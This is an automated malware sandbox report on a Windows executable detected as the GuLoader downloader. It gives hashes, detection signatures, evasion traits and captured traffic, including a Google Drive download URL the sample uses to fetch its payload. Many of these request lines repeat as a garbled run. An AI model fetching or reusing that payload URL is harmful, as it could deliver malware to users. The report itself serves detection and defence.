Windows Analysis Report
fTSt7dc60O.exe

Overview

General Information

Sample name: fTSt7dc60O.exe (renamed because original name is a hash value)
Original sample name: 2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb.exe
Analysis ID: 1587610
MD5: 0eecc852b848039da55141fb43dd01e2
SHA1: 9f1f57db9890e515dd132bc7d1157ef1a2ff0cad
SHA256: 2eaf30511cb438075facb1d59f944a6ddedf3aa5c2620e0916a150f5415983bb
Tags: exe, user-adrian__luca
Infos:

Detection

GuLoader
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fTSt7dc60O.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\fTSt7dc60O.exe" MD5: 0EECC852B848039DA55141FB43DD01E2)
    • fTSt7dc60O.exe (PID: 4640 cmdline: "C:\Users\user\Desktop\fTSt7dc60O.exe" MD5: 0EECC852B848039DA55141FB43DD01E2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

No configs have been found

Source | Rule | Description | Author | Strings
00000000.00000002.1367001967.00000000055DB000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000008.00000002.2484621112.000000000219B000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:39:04.044797+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 51990 | 172.217.18.14 | 443 | TCP

      AV Detection

Source: fTSt7dc60O.exe | Virustotal: Detection: 77%
Source: fTSt7dc60O.exe | ReversingLabs: Detection: 66%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: fTSt7dc60O.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:51990 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:51996 version: TLS 1.2
Source: fTSt7dc60O.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\fTSt7dc60O.exe | Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004057D0
Source: C:\Users\user\Desktop\fTSt7dc60O.exe | Code function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
Source: C:\Users\user\Desktop\fTSt7dc60O.exe | Code function: 0_2_00402770 FindFirstFileW,0_2_00402770
Source: C:\Users\user\Desktop\fTSt7dc60O.exe | Code function: 8_2_00402770 FindFirstFileW,8_2_00402770
Source: C:\Users\user\Desktop\fTSt7dc60O.exe | Code function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_004057D0
Source: C:\Users\user\Desktop\fTSt7dc60O.exe | Code function: 8_2_0040628B FindFirstFileW,FindClose,8_2_0040628B
Source: global traffic | TCP traffic: 192.168.2.7:51984 -> 1.1.1.1:53
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:51990 -> 172.217.18.14:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: drive.google.com
  Cache-Control: no-cache
  Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
Source: global traffic | HTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
  Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
      Source: global trafficHTTP traffic detected: GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
